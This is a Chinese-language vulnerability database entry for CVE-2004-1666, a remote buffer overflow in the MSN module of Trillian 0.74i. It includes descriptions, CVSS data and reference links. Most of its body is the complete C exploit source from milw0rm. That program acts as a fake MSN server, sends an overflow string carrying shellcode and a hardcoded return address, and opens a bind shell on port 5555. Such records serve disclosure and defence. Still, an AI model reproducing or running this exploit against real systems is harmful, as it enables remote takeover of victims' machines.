CVE-2004-1666
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:58:44
NMCOE    

[原文]Buffer overflow in the MSN module in Trillian 0.74i allows remote MSN servers to execute arbitrary code via a long string that ends in a newline character.


[CNNVD]Cerulean Studios Trillian Client MSN模块远程缓冲区溢出漏洞(CNNVD-200412-135)

        Trillian 0.74i的MSN模块存在缓冲区溢出漏洞。远程MSN服务器可以借助以新行字符结尾的超长字符串执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1666
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1666
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-135
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109466618609375&w=2
(UNKNOWN)  BUGTRAQ  20040908 Cerulean Studios Trillian 0.74i Buffer Overflow in MSN module exploit
http://unsecure.altervista.org/security/trillian.htm
(VENDOR_ADVISORY)  MISC  http://unsecure.altervista.org/security/trillian.htm
http://www.securityfocus.com/bid/11142
(VENDOR_ADVISORY)  BID  11142
http://xforce.iss.net/xforce/xfdb/17292
(VENDOR_ADVISORY)  XF  trillian-msn-bo(17292)

- 漏洞信息

Cerulean Studios Trillian Client MSN模块远程缓冲区溢出漏洞
高危 缓冲区溢出
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Trillian 0.74i的MSN模块存在缓冲区溢出漏洞。远程MSN服务器可以借助以新行字符结尾的超长字符串执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (435)

Trillian 0.74i Remote Buffer Overflow Exploit (MSN Module Bug) (EDBID:435)
windows remote
2004-09-08 Verified
0 Komrade
N/A [点击下载]
/*
	Cerulean Studios Trillian 0.74i Buffer Overflow in MSN module exploit
	created by Komrade  -  unsecure altervista org

	Written for Windows 2000 / Windows XP.
	Tested on Windows XP Professional sp0.

	This exploit spawn a shell on port 5555, you have just to execute the
	program	and connect to port 5555.
*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <string.h>

int main(int argc,char **argv){

	char shellcode[] =
	"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA\xEB"
	"\x05\xE8\xEB\xFF\xFF\xFF\x70\x99\x98\x99\x99\xC3\xFD\x12\xD8\xA9\x12"
	"\xD9\x95\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12"
	"\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8"
	"\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E"
	"\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
	"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
	"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71\xE5"
	"\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3\x9D\xC0"
	"\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x69\x12"
	"\x41\x5E\x9E\x9B\x99\x8C\x2A\xAA\x59\x10\xDE\x9D\xF3\x89\xCE\xCA\x66"
	"\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66\xCE\x65\x1A\x75\xDD"
	"\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B\x62\x10\xDF\xA1\x10\xDF"
	"\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99\x99\x14\xDE\x89\xC9\xCF\xCA"
	"\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9"
	"\xCA\x66\xCE\x7D\xC9\x66\xCE\x71\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB"
	"\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66"
	"\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB"
	"\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED"
	"\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8"
	"\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA"
	"\xF2\xFC\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99"
	"\xF8\xFA\xFA\xFC\xE9\xED\x99";


	SOCKET sock, client;
	struct sockaddr_in sock_addr, client_addr;
	WSADATA data;
	WORD p;
	char mess[4096];
	int lun, n, i;

	p = MAKEWORD(2, 0);
	WSAStartup(p, &data);

	printf("------------------------------------------------------------------------\r\n");
	printf("-  Cerulean Studios Trillian 0.74i MSN module Buffer Overflow exploit  -\r\n");
	printf("-                   for Windows 2000 / Windows XP                      -\r\n");
	printf("-                                                                      -\r\n");
	printf("-         created by Komrade  -  http://unsecure.altervista.org        -\r\n");
	printf("------------------------------------------------------------------------\r\n");

	sock = socket(PF_INET,SOCK_STREAM, 0);
	sock_addr.sin_family = PF_INET;
	sock_addr.sin_port = htons(1863);
	sock_addr.sin_addr.s_addr = INADDR_ANY;

	bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in));
	listen(sock,1);

	lun = sizeof (struct sockaddr);

	printf("\r\nWaiting for a connection...\r\n");

	client = accept(sock, (struct sockaddr*)&client_addr, &lun);
	if (client <= 0){
		printf("Unable to wait for connections\r\n");
		exit(-1);
	}

	n=recv(client, mess, sizeof(mess),0);
	if (n < 0){
		printf("Error receving connections\r\n");
		exit(-1);
	}

	printf("Received a connection request from a client.\r\n");

	strcpy(mess, shellcode);

	for(i=strlen(shellcode); i < 4090; i++)
		mess[i]='x';

	mess[i]=0x33;	/**/
	mess[i+1]=0x12;	/*return address of a "call ebx" command in trillian.exe*/
	mess[i+2]=0x40;	/**/
	mess[i+3]='\r';
	mess[i+4]='\n';
	mess[i+5]='\0';

	n = send(client, mess, strlen(mess),0);
	if (n > 0){
		printf("Exploit sent succesfully.\r\n");
		printf("Now connect to port 5555.\r\n");
	}
	else
		printf("Error sending the exploit\r\n");

	closesocket (client);
	closesocket(sock);
	WSACleanup();
	return 0;
}

// milw0rm.com [2004-09-08]
		

- 漏洞信息

9777
Trillian MSN Plugin Messenger Server Overflow
Remote / Network Access Infrastructure, Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Trillian contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered when a boundary error within the MSN module occurs. It is possible that the flaw may allow a malicious to gain access to the target system resulting in a loss of integrity.

- 时间线

2004-09-08 Unknow
2004-09-08 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站